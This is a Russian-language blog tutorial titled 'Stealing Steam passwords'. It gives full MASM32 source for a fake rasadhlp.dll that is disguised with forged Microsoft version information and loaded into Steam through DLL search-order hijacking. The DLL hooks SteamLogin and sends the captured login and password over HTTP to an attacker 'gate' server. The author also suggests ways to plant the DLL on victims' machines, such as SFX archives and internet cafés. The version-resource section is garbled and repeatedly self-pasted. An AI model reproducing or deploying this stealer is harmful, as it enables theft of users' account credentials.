Финансы Сайт на котором знают все про финансы

Тащим пароли от Steam

В связи с огромной популярностью сервиса Steam, решил написать простой пример осуществления перехвата вводимых данных при авторизации (логин и пароль) с дальнейшей отправкой на гейт.
Беглый поиск в интернете показал, что подобные примеры существуют, однако, зачастую громоздки, либо уже устарели.
Итак, для осуществления перехвата необходимо определить, куда передается управление при попытке авторизации в Стиме. Основой для взаимодействия с сервисом Steam является Steam.dll, которая экспортирует множество функций, в том числе и функцию SteamLogin, которая как раз и вызывается при попытке авторизации.
Таким образом необходимо реализовать «прослойку», которая будет выполняется перед вызовом этой функции и передавать введенные данные на наш гейт. Для начала нужно определить, возможно ли заставить Steam подгрузить нашу библиотеку без внесения изменения в оригинальные файлы.
Если запустить Steam и посмотреть, какие dll’ки и откуда пытается подгрузить исполняемый файл, то мы увидим примерно следующее (я смотрел с помощью FileMon, но уже давно существует более продвинутый Process Monitor):

Как мы видим, подгружается множество библиотек, причем красным выделены неудачные попытки загрузки библиотек. При вызове LoadLibrary производится попытка найти некоторые системные библиотеки сначала в директории с исполняемым файлом, а уже потом в System32. Это позволяет сделать следующую вещь: выбрать какую-нибудь редкоиспользуемую системную библиотеку из тех, которые исполняемый файл сначала ищет в своей директории (например, rasadhlp.dll), создать свою библиотеку с таким же именем (которая будет сплайсить функцию SteamLogin) с пробросом экспортов в оригинальную библиотеку.

Условно это будет выглядеть следующим образом:

При попытке вызова какой-либо экспортируемоей функции из нашей библиотеки, вызов будет перенаправлен в оригинальную библиотеку. И при загрузке наша библиотека запишет инструкцию вида jmp XXXXXXX в начало функции SteamLogin, что позволит предварительно отправить данные авторизации на гейт, а уже потом вернуться к выполнению оригинальной функции.
Код библиотеки на MASM32 приведен ниже:

.486
.model flat, stdcall
option casemap :none

;Подключаем основные макросы и библиотеки
include \masm32\include\windows.inc
include \masm32\macros\macros.asm
include \masm32\macros\windows.asm

uselib kernel32, masm32, user32, ws2_32

;Подключаем inc и lib файлы, необходимые для проброса экспортов в оригинальную dll
include rasodhlp.inc
includelib rasodhlp.lib

;Прототип функции отправки
report proto :dword,:dword

JUMPNEAR STRUCT 1
opcd BYTE ?
reladdr DWORD ?
JUMPNEAR ENDS

Как создать файлы rasodhlp.lib и rasodhlp.inc, я поясню ниже. Смысл структуры JUMPNEAR описан в статье про инжектор. Кстати, я не использовал полезные макросы из статьи про инжектор. Это связано с тем, что в данном случае осуществляется сплайсинг не winapi-функции, соответственно, у нее не такой пролог, как у большинства winapi, также требуется сохранять состояние регистров и флагов перед выполнением своих действий, да и нам не требуется осуществлять возврат в нашу функцию после вызова оригинальной SteamLogin.
Далее объявим необходимые переменные:

.data
;Адрес, по которому будут отправляться отчеты
gate_path 	db "/gate.php",0
host 		db "yoursite.com",0

;Шаблон для GET-запроса
;Далее в коде вместо первого %s будет подставлена переменная gate_path,
;вместо второго - логин, вместо третьего - пароль, а вместо четвертого - переменная host
request db "GET %s?var1=%s&var2=%s HTTP/1.0",0dh,0ah
		db "Host: %s",0dh,0ah
		db "Connection: Close",0dh,0ah,0dh,0ah,0

.data?
;Переменная для хранения адреса оригинальной функции SteamLogin
steam_login dd ?

Пролог можно посмотреть в любом дизассемблере, для функции SteamLogin он выглядит следующим образом:

Реализуем процедуру, которая будет выполняться до вызова оригинальной функции:

.code

;void (*SteamLogin)(char* User, char* Password, int isSecureComputer, TSteamError& SteamErr);
;Процедура, которая будет выполняться перед SteamLogin
Steal:
	;Пролог из оригинальной SteamLogin
	push ebp
	mov ebp,esp
	push -1
	;Сохраняем состояние регистров и флагов
	pushad
	pushfd
	;При обращении к SteamLogin данные авторизации хранятся как в стеке, так и в регистрах eax,ecx
	invoke report,ecx,eax
	;Восстанавливаем состояние регистров и флагов
	popfd
	popad
	
	;Передаем управление в оригинальную процедуру SteamLogin
	push steam_login
	add dword ptr[esp], 5
	retn

Теперь процедуру отправки данных на гейт:

;Процедура отправки данных на сервер
report proc login:dword,passw:dword
local buffer[512] : byte
local sock : dword
local wsa : WSADATA
local saddr : sockaddr_in
	
	;Инициализируем winsock
	invoke WSAStartup,101h,addr wsa
	.if eax == NO_ERROR
		;Создаем сокет
		invoke socket,PF_INET,SOCK_STREAM,0
		.if eax != SOCKET_ERROR
			mov sock,eax
			;Получаем ip хоста
			invoke gethostbyname,offset host
			.if eax != 0
				;Помещаем в eax первый элемент h_addr_list из структры hostent
				mov eax,[eax+12]
				mov eax,[eax]
				mov eax,[eax]
				;Заполняем структуру, необходимую для подключения
				mov saddr.sin_addr,eax
				invoke htons,80
				mov saddr.sin_port,ax
				mov saddr.sin_family,AF_INET
				;Подключаем сокет
				invoke connect,sock,addr saddr,sizeof saddr
				.if eax != SOCKET_ERROR
					;Формируем запрос
					invoke wsprintf,addr buffer,offset request,offset gate_path,login,passw,offset host
					;Определяем длину запроса
					invoke lstrlen,addr buffer
					;Отправляем данные
					invoke send,sock,addr buffer,eax,0
				.endif
			.endif
			;Закрываем сокет
			invoke closesocket,sock
		.endif
		;Выполняем очистку
		invoke WSACleanup
	.endif
	
	ret
report endp

И, наконец, точку входа DLL:

LibMain proc instance:dword,reason:dword,reserved:dword
local pr : dword
local hl : dword
local path1[512] : dword
local path2[512] : dword

	.if reason == DLL_PROCESS_ATTACH
		;Получаем путь к System32
		invoke GetSystemDirectory,addr path1,512
		;Получаем путь к Steam.exe
		invoke GetAppPath,addr path2
		
		invoke wsprintf,addr path1,chr$("%s\%s"),addr path1,chr$("rasadhlp.dll")
		invoke wsprintf,addr path2,chr$("%s\%s"),addr path2,chr$("rasodhlp.dll")
		;Копируем dll в директорию стима
		invoke CopyFile,addr path1,addr path2,0
		.if eax == 0
			ret
		.endif
		;Загружать скопированную библиотеку в память необязательно, т.к. загрузчик сам её
		;загрузит при вызове GetProcAddress
		
		;Помещаем в hl хендл dll стима
		mov hl,FUNC(GetModuleHandle,chr$("Steam.dll"))
		;Помещаем в steam_login адрес процедуры SteamLogin из Steam.dll
		mov steam_login,FUNC(GetProcAddress,hl,chr$("SteamLogin"))
		
		;Изменяем атрибуты защиты памяти
		invoke VirtualProtect,steam_login,sizeof JUMPNEAR,PAGE_READWRITE,addr pr
		;Помещаем в начало процедуры SteamLogin конструкцию вида jmp XXXXXXXX,
		;где XXXXXXXX - адрес процедуры Steal
		mov eax,steam_login
		assume eax: ptr JUMPNEAR
		mov [eax].opcd, 0e9h
		mov ecx,offset Steal
		sub ecx,steam_login
		sub ecx,5
		mov [eax].reladdr,ecx
		assume eax:nothing
		
		;Восстанавливаем исходные атрибуты
		invoke VirtualProtect,steam_login,sizeof JUMPNEAR,pr,addr pr
		;Сообщаем об удачной загрузке dll'ки
		mov eax,1
	
	.endif
	
	ret
LibMain endp

end LibMain

Также нужно создать файл rasadhlp.def, который будет содержать описание экспортов библиотеки:

LIBRARY rasadhlp
EXPORTS
AcsHlpAttemptConnection = rasodhlp.AcsHlpAttemptConnection
AcsHlpNbConnection = rasodhlp.AcsHlpNbConnection
AcsHlpNoteNewConnection = rasodhlp.AcsHlpNoteNewConnection
WSAttemptAutodialAddr = rasodhlp.WSAttemptAutodialAddr
WSAttemptAutodialName = rasodhlp.WSAttemptAutodialName
WSNoteSuccessfulHostentLookup = rasodhlp.WSNoteSuccessfulHostentLookup

и файлы rasodhlp.lib и rasodhlp.inc, которые необходимы для компиляции. Чтобы создать файл rasodhlp.inc, необходимо посмотреть в дизассемблере экспорты оригинальной библиотеки

и определить количество аргументов, которые передаются в эти функции, чтобы составить прототипы.
Я ориентировался исключительно по инструкции retn (т.е. число после retn / 4 = количество аргументов):

Вот что у меня получилось:

AcsHlpAttemptConnection PROTO :DWORD
AcsHlpNbConnection PROTO :DWORD
AcsHlpNoteNewConnection PROTO :DWORD,:DWORD
WSAttemptAutodialAddr PROTO :DWORD,:DWORD
WSAttemptAutodialName PROTO :DWORD
WSNoteSuccessfulHostentLookup PROTO :DWORD,:DWORD

Для создания lib-файла понадобится программа inc2l, которая обычно есть в комплекте MASM32. Для большей похожести на оригинал можно ещё создать .rc файл с информацией о версии dll’ки:

#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" VALUE "ProductVersion", "5.1.2600.5512
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" VALUE "CompanyName", "Microsoft Corporation
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" VALUE "FileDescription", "Remote Access AutoDial Helper
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" VALUE "InternalName", "rasadhlp.dll
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" VALUE "OriginalFilename", "rasadhlp.dll
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" VALUE "ProductName", "Microsoft® Windows® Operating System
#define IDR_VERSION1 1

IDR_VERSION1 VERSIONINFO
FILEVERSION 5,1,2600,5512
PRODUCTVERSION 5,1,2600,5512
FILEOS 0x00000004
FILETYPE 0x00000000
BEGIN
  BLOCK "StringFileInfo"
  BEGIN
    BLOCK "FFFF0000"
    BEGIN
      VALUE "FileVersion", "5.1.2600.5512\0"
      VALUE "ProductVersion", "5.1.2600.5512\0"
      VALUE "CompanyName", "Microsoft Corporation\0"
      VALUE "FileDescription", "Remote Access AutoDial Helper\0"
      VALUE "InternalName", "rasadhlp.dll\0"
      VALUE "LegalCopyright", "© Microsoft Corporation. All rights reserved.\0"
      VALUE "OriginalFilename", "rasadhlp.dll\0"
      VALUE "ProductName", "Microsoft® Windows® Operating System\0"
    END
  END
  BLOCK "VarFileInfo"
  BEGIN
    VALUE "Translation", 0xFFFF, 0x0000
  END
END
" END END BLOCK "VarFileInfo" BEGIN VALUE "Translation", 0xFFFF, 0x0000 END END

Теперь можно и скомпилировать все это дело. После компиляции получим свою кастомную rasadhlp.dll, которую необходимо поместить в директорию с файлом Steam.exe. Сделать это можно разными способами, например, воспользоваться уязвимостью dll hijacking в каком-либо стороннем приложении, сделать sfx-архив, который будет пытаться скопировать библиотеку в возможные места расположения стима после распаковки или банально прийти в какое-нибудь интернет-кафе, куда имеют обыкновение ходить игроки в продукты Steam (в США таких мест довольно много).
И, напоследок, код гейта, на который будут приходить реквизиты доступа:

Не забудьте создать файл log.txt, проставить на него права доступа 777 и закинуть в директорию файл .htaccess:

  order allow,deny
  deny from all

Тогда собранные данные не попадут в чужие руки.

Исходники одним архивом: скачать